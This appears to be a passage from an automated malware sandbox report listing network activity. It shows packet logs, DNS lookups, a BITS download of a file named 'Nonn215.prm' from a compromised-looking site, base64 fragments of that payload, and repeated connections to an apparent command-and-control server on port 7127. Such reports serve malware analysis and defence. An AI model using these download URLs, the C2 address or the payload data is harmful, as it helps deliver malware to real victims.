                                                                              Dec 19, 2024 12:37:36.830951929 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:38:00.697405100 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:00.697463036 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:00.697545052 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:00.709702015 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:00.709727049 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:02.600188017 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:02.600279093 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.079015017 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.079076052 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.080146074 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.080223083 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.116400957 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.159356117 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.679624081 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.679660082 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.679769993 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.679821968 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.679883003 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.902662992 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.902681112 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.902827978 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.928363085 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.928503036 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.953608990 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.953713894 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:03.987631083 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:03.987926006 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.142457008 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.142538071 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.162655115 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.162744999 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.186760902 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.186904907 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.204511881 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.204677105 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.222160101 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.222253084 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.240082026 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.240169048 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.263927937 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.264008045 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.376147985 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.376424074 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.388851881 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.388974905 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.398530960 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.398623943 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.409529924 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.409626007 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.416029930 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.416142941 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.422461987 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.422558069 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.431425095 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.431545973 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.437539101 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.437810898 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.444454908 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.444555044 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.450730085 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.450824976 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.459815025 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.459960938 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.498488903 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.498610973 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.504627943 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.504734993 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.569186926 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.569463015 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.573921919 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.574018955 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.615206003 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.615444899 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.620584011 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.620709896 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.628060102 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.628154993 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.687098980 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.687324047 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.692069054 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.692197084 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.694566965 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.694649935 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.697822094 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.697906971 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.701206923 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.701291084 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.704507113 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.704585075 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.708856106 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.708936930 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.712177992 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.712325096 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.716119051 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.716204882 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.719008923 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.719094038 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.723285913 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.723372936 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.758342028 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.758583069 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.762061119 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.762151003 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.804546118 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.804826975 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.809236050 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.809328079 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.817055941 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.817173958 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.823606014 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.823726892 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.828177929 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.828258038 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.837162971 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.837276936 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.844198942 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.844270945 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.851120949 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.851205111 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.858722925 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.858797073 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.861212015 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.861282110 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.867247105 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.867324114 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.873663902 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.873730898 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.881481886 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.881555080 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.888644934 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.888704062 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.896934986 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.897005081 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.952445984 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.952548981 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.954898119 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.954982996 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:04.997831106 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:04.997956991 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.003103971 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.003186941 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.010610104 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.010690928 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.017102003 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.017200947 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.022033930 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.022129059 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.029927969 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.030011892 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.037468910 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.037687063 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.045221090 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.045324087 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.052582026 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.052699089 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.058583975 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.058681011 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.064970016 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.065077066 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.072387934 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.072485924 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.079340935 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.079447031 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.080637932 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.080720901 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.080751896 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.080805063 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.080813885 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.080813885 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.080840111 CET44349781103.120.177.150192.168.2.7
                                                                              Dec 19, 2024 12:38:05.080883980 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:05.080909967 CET49781443192.168.2.7103.120.177.150
                                                                              Dec 19, 2024 12:38:16.677249908 CET498197127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:16.797197104 CET71274981991.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:16.797327042 CET498197127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:16.797463894 CET498197127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:16.917061090 CET71274981991.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:21.726268053 CET498197127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:21.886487961 CET71274981991.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:26.728446960 CET498427127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:26.848107100 CET71274984291.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:26.848236084 CET498427127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:26.848438025 CET498427127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:26.968009949 CET71274984291.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:31.729083061 CET498427127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:31.890944004 CET71274984291.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:36.739686012 CET498687127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:36.859843016 CET71274986891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:36.859930038 CET498687127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:36.860107899 CET498687127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:36.979815960 CET71274986891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:38.701857090 CET71274981991.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:38.707077026 CET498197127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:41.760687113 CET498687127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:41.922924042 CET71274986891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:46.770941019 CET498937127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:46.890921116 CET71274989391.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:46.891099930 CET498937127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:46.891321898 CET498937127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:47.013654947 CET71274989391.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:48.733141899 CET71274984291.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:48.733274937 CET498427127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:51.790852070 CET498937127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:51.954583883 CET71274989391.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:56.786609888 CET499187127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:56.906692028 CET71274991891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:56.906924963 CET499187127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:56.907095909 CET499187127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:38:57.030926943 CET71274991891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:58.780507088 CET71274986891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:38:58.780797958 CET498687127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:01.806513071 CET499187127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:01.970406055 CET71274991891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:06.830929995 CET499387127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:06.950670958 CET71274993891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:06.950896025 CET499387127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:06.951025009 CET499387127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:07.073002100 CET71274993891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:08.780149937 CET71274989391.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:08.780318022 CET498937127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:11.837578058 CET499387127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:11.999265909 CET71274993891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:16.833815098 CET499607127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:16.953243017 CET71274996091.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:16.953466892 CET499607127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:16.953732014 CET499607127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:17.073195934 CET71274996091.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:18.796078920 CET71274991891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:18.796125889 CET499187127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:21.838476896 CET499607127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:22.002284050 CET71274996091.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:26.849154949 CET499847127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:26.968669891 CET71274998491.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:26.968750954 CET499847127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:26.968925953 CET499847127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:27.088463068 CET71274998491.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:28.859298944 CET71274993891.92.252.226192.168.2.7
                                                                              Dec 19, 2024 12:39:28.859369993 CET499387127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:31.869299889 CET499847127192.168.2.791.92.252.226
                                                                              Dec 19, 2024 12:39:32.030292988 CET71274998491.92.252.226192.168.2.7

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 19, 2024 12:37:32.179490089 CET6022653192.168.2.71.1.1.1
                                                                              Dec 19, 2024 12:37:32.317847013 CET53602261.1.1.1192.168.2.7
                                                                              Dec 19, 2024 12:37:59.427611113 CET5383853192.168.2.71.1.1.1
                                                                              Dec 19, 2024 12:38:00.442461967 CET5383853192.168.2.71.1.1.1
                                                                              Dec 19, 2024 12:38:00.691883087 CET53538381.1.1.1192.168.2.7
                                                                              Dec 19, 2024 12:38:00.691914082 CET53538381.1.1.1192.168.2.7

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 19, 2024 12:37:32.179490089 CET192.168.2.71.1.1.10x28b0Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                              Dec 19, 2024 12:37:59.427611113 CET192.168.2.71.1.1.10xa7e6Standard query (0)www.royalengineeringllc.comA (IP address)IN (0x0001)false
                                                                              Dec 19, 2024 12:38:00.442461967 CET192.168.2.71.1.1.10xa7e6Standard query (0)www.royalengineeringllc.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 19, 2024 12:37:32.317847013 CET1.1.1.1192.168.2.70x28b0No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 19, 2024 12:37:32.317847013 CET1.1.1.1192.168.2.70x28b0No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                              Dec 19, 2024 12:38:00.691883087 CET1.1.1.1192.168.2.70xa7e6No error (0)www.royalengineeringllc.comroyalengineeringllc.comCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 19, 2024 12:38:00.691883087 CET1.1.1.1192.168.2.70xa7e6No error (0)royalengineeringllc.com103.120.177.150A (IP address)IN (0x0001)false
                                                                              Dec 19, 2024 12:38:00.691914082 CET1.1.1.1192.168.2.70xa7e6No error (0)www.royalengineeringllc.comroyalengineeringllc.comCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 19, 2024 12:38:00.691914082 CET1.1.1.1192.168.2.70xa7e6No error (0)royalengineeringllc.com103.120.177.150A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.astenterprises.com.pk
                                                                              • www.royalengineeringllc.com

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749711107.161.23.1504437896C:\Windows\System32\svchost.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-19 11:37:33 UTC162OUTHEAD /ms/Nonn215.prm HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: www.astenterprises.com.pk
                                                                              2024-12-19 11:37:34 UTC404INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              content-type: application/octet-stream
                                                                              last-modified: Mon, 05 Feb 2024 16:17:14 GMT
                                                                              accept-ranges: bytes
                                                                              content-length: 418368
                                                                              date: Thu, 19 Dec 2024 11:37:33 GMT
                                                                              server: LiteSpeed
                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749717107.161.23.1504437896C:\Windows\System32\svchost.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-19 11:37:35 UTC213OUTGET /ms/Nonn215.prm HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              If-Unmodified-Since: Mon, 05 Feb 2024 16:17:14 GMT
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: www.astenterprises.com.pk
                                                                              2024-12-19 11:37:35 UTC404INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              content-type: application/octet-stream
                                                                              last-modified: Mon, 05 Feb 2024 16:17:14 GMT
                                                                              accept-ranges: bytes
                                                                              content-length: 418368
                                                                              date: Thu, 19 Dec 2024 11:37:35 GMT
                                                                              server: LiteSpeed
                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                              2024-12-19 11:37:35 UTC16384INData Raw: 36 77 4c 35 6d 48 45 42 6d 37 75 71 41 68 77 41 36 77 4b 49 65 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 69 56 4f 75 53 31 34 32 46 35 78 41 5a 76 72 41 6f 6a 5a 67 65 6d 74 6f 35 38 49 63 51 47 62 63 51 47 62 67 65 6d 41 31 44 68 57 63 51 47 62 36 77 4a 46 6b 75 73 43 6d 54 39 78 41 5a 75 36 35 76 7a 43 4a 75 73 43 6c 37 72 72 41 6c 67 61 36 77 4a 30 61 33 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4c 4b 69 64 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4b 79 68 33 45 42 6d 34 48 35 46 67 42 2b 41 33 7a 4e 63 51 47 62 36 77 4c 33 4e 59 74 45 4a 41 52 78 41 5a 76 72 41 6a 30 4e 69 63 50 72 41 75 4a 4b 63 51 47 62 67 63 50 76 57 2b 59 41 36 77 4b 64 6f 4f 73 43 70 4c 43 36 74 4f 72 5a 69 4f 73 43 72 63 66 72 41 6b 64
                                                                              Data Ascii: 6wL5mHEBm7uqAhwA6wKIe3EBmwNcJARxAZvrAiVOuS142F5xAZvrAojZgemto58IcQGbcQGbgemA1DhWcQGb6wJFkusCmT9xAZu65vzCJusCl7rrAlga6wJ0a3EBmzHKcQGbcQGbiRQLcQGb6wLKidHicQGbcQGbg8EE6wKyh3EBm4H5FgB+A3zNcQGb6wL3NYtEJARxAZvrAj0NicPrAuJKcQGbgcPvW+YA6wKdoOsCpLC6tOrZiOsCrcfrAkd
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 6f 63 2b 35 79 68 76 6b 43 4d 31 58 73 6d 49 34 5a 4c 37 4e 55 56 76 4a 73 31 7a 50 4e 70 49 57 44 57 31 52 62 63 78 6f 42 66 61 2f 64 44 42 4e 67 59 45 50 4f 61 51 4c 58 55 49 56 68 46 4a 44 43 6c 4a 53 51 77 70 53 55 6b 4d 4b 55 6c 4b 33 62 39 47 49 74 67 4b 51 57 6b 4d 46 59 6b 4c 49 43 6c 4a 53 51 77 70 53 55 6b 4d 4b 55 6c 4a 44 43 71 7a 6c 49 72 74 7a 64 6f 66 57 6c 36 56 38 70 67 48 70 50 66 49 43 43 73 4c 68 75 71 34 62 48 4e 4f 68 6b 30 52 53 43 73 4c 68 46 76 6e 68 43 74 4f 35 51 51 4d 48 53 78 53 57 32 37 56 4b 46 63 39 71 67 6e 42 42 37 37 50 32 38 6d 4e 69 5a 6f 61 6b 79 38 4d 41 63 39 4c 45 72 67 32 7a 50 35 47 6e 35 56 74 6c 68 76 46 56 71 67 6c 37 2f 67 33 58 6d 6c 48 5a 42 32 64 59 36 42 68 70 64 70 33 54 73 56 58 57 37 52 69 4c 6f 4a 64
                                                                              Data Ascii: oc+5yhvkCM1XsmI4ZL7NUVvJs1zPNpIWDW1RbcxoBfa/dDBNgYEPOaQLXUIVhFJDClJSQwpSUkMKUlK3b9GItgKQWkMFYkLIClJSQwpSUkMKUlJDCqzlIrtzdofWl6V8pgHpPfICCsLhuq4bHNOhk0RSCsLhFvnhCtO5QQMHSxSW27VKFc9qgnBB77P28mNiZoaky8MAc9LErg2zP5Gn5VtlhvFVqgl7/g3XmlHZB2dY6Bhpdp3TsVXW7RiLoJd
